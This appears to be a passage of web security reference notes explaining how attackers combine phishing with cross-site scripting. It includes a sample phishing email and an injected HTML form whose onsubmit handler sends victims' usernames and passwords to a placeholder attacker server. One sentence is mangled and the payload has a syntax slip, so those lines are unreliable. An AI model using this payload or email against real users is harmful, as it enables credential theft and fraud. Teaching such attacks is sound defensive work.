• Phishing uses XSS technique to steal victims credentials and subsequently commit crimes using the stolen credentials.
  • Attack Vectors:
    • Staged site:
      • Use social engineering (e.g., email, messageboard, etc.) to trick a victim to click on a link to a staged site that has a HTML form crafted to resemble the original form.
      • The crafted url is usually camouflaged by encoding the malicious portion of the injected code or shortening the entire url.
      • Here is an example of the email sent to the victim:
        Dear Victim User, Due to an emergency server shut down, we have been experiencing some user account issues. As a result it is necessary that you login to your account within the next 24 hours to validate user membership or else you risk having your membership being terminated. Please proceed by following the link, the hackers version of login page, and log into your account. Thank you and we apologize for the inconvenience
      • After the victim sends the credential, the attackers fool the victims by returning the following message to the victim:
        Dear Victim User, the system is in maintenance, please try it later. Thank you and we apologize for the inconvenience.
    • Injected code:
      • Search a victim site and examine its login page.
      • Create the injected code and a fake login page that looks similar, if not identical, to the victim site's. For example:
      • </form>
        <form action="login.aspx" method="post" onsubmit="XSSimage = new Image; XSSimage.src=attackerserver + document.forms(1).login.value + :+document.forms(1).password.value;">
      • The </form> tag is providing a closing tag for the original form and therefore allowing the attacker to add and manipulate his own. The onsubmit property is a set of %28OWASP-DV-003%29#Gray_Box_testing_and_exampleavascript instructions that is executed when the user clicks the submit button, just before the actual form request is sent. So a new image called XSS is created when the user clicks the login button to submit the form and a request will silently be sent to attackers server that contains the login username and password of the victim.